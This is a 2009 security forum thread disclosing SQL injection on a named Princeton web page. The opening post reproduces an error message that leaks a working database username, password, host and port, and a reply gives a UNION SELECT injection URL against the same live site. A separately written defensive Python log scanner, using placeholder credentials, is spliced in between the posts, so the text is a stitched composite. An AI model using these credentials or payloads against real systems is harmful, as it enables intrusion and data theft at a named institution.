Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
princeton.edu SQL injection/SQL username:password
Posted by: DanielG
Date: May 23, 2009 09:10AM

http://wws.princeton.edu/webmedia/list_speakers.xml?start=f'

generates the error:
RXML run error: Query failed:[...] <emit host="mysql://wws_web:WW$W3bUs3r@www-01dept.princeton.edu:3308/wws_webcasts"[...]

www-01dept.princeton.edu:3308 is connectable from the internet, and the user:password works.

Is this like a major issue since it's a well known school?

--
Yeah I'm Dutch, sweeeeeeeeeeet.
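The error string quoted above hands out a complete database DSN, login included. The following is an added example (not code from the thread or from the site in question) of a small log scanner a defender can run over application error output: it finds URI-style `scheme://user:password@host:port` credentials, reports where they occur, and redacts the password before the line is stored or shown. The log lines, host name and credentials in it are constructed placeholders.

```python
import re

# Matches a URI-style DSN of the form scheme://user:password@host[:port][/db],
# the shape in which the RXML <emit host="mysql://..."> error exposed the login.
DSN_RE = re.compile(
    r'(?P<scheme>[A-Za-z][A-Za-z0-9+.-]*)://'
    r'(?P<user>[^:/@\s"\']+):(?P<password>[^@\s"\']+)@'
    r'(?P<host>[^:/\s"\']+)(?::(?P<port>\d+))?'
)

# Constructed sample: a quote probe, the resulting error text (placeholder
# credentials and host, not the thread's), and a benign request.
SAMPLE_LOG = [
    "GET /webmedia/list_speakers.xml?start=f' 500",
    'RXML run error: Query failed: syntax error <emit host="mysql://app_user:s3cr3t-example@db.example.internal:3308/webcasts" query="SELECT">',
    "GET /webmedia/list_speakers.xml?start=10 200",
]

def find_leaked_dsns(text):
    """Return one dict per credential-bearing DSN in text; the password itself is deliberately omitted."""
    return [
        {"scheme": m["scheme"], "user": m["user"], "host": m["host"],
         "port": int(m["port"]) if m["port"] else None}
        for m in DSN_RE.finditer(text)
    ]

def redact_dsns(text):
    """Replace the password component of every DSN so the line is safe to log or display."""
    return DSN_RE.sub(
        lambda m: f'{m["scheme"]}://{m["user"]}:***@{m["host"]}'
                  + (f':{m["port"]}' if m["port"] else ""),
        text,
    )

def scan_log(lines):
    """Return (line_number, finding) pairs, 1-based, for every line that leaks a DSN."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        for dsn in find_leaked_dsns(line):
            findings.append((lineno, dsn))
    return findings

if __name__ == "__main__":
    for lineno, dsn in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {dsn['user']}@{dsn['host']}:{dsn['port']} ({dsn['scheme']}) leaked in error output")
    print(redact_dsns(SAMPLE_LOG[1]))
```

Running the scanner over the real error text from the first post would flag the same pattern; the finding is the signal that verbose errors must be disabled and the exposed credential rotated.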

Re: princeton.edu SQL injection/SQL username:password
Posted by: Kyo
Date: May 23, 2009 11:22AM

It's always a major issue.

http://wws.princeton.edu/webmedia/list_speakers.xml?start=f%27%20OR%201=0%20UNION%20SELECT%201--%20-

Re: princeton.edu SQL injection/SQL username:password
Posted by: wireghoul
Date: May 24, 2009 08:42PM

Even worse, www-01dept.princeton.edu:3308 is internet facing and the error string contains the login. I hope your school is not storing any sensitive information in said database and that they are preparing an official breach statement.

[www.justanotherhacker.com]

Re: princeton.edu SQL injection/SQL username:password
Posted by: PaPPy
Date: May 24, 2009 10:12PM

I think that was stated in the subject and first post...

http://www.xssed.com/archive/author=PaPPy/

Re: princeton.edu SQL injection/SQL username:password
Posted by: thrill
Date: May 24, 2009 11:45PM

hmm.. maybe my old UCLA boss, Karen M. is advising them on security.. she once told me "we're a school, we have nothing a hacker would want!".. :)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: princeton.edu SQL injection/SQL username:password
Posted by: PaPPy
Date: May 24, 2009 11:52PM

lol, other than SSNs or some supercomputer that I can get my hands on to...dumb teachers

http://www.xssed.com/archive/author=PaPPy/

Re: princeton.edu SQL injection/SQL username:password
Posted by: thrill
Date: May 25, 2009 01:20AM

She wasn't a teacher.. she was the manager of the IT department in the Administrative Information Systems.. yeah.. those same people who do control the mainframe with all the SS#'s and other vital information on all students, staff and faculty.. but yes, we do not have anything a hacker would want.. oh yeah, and linux is a 'hobby' OS, it'll never be mainstream.. another choice quote from her in 1999.. :)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill
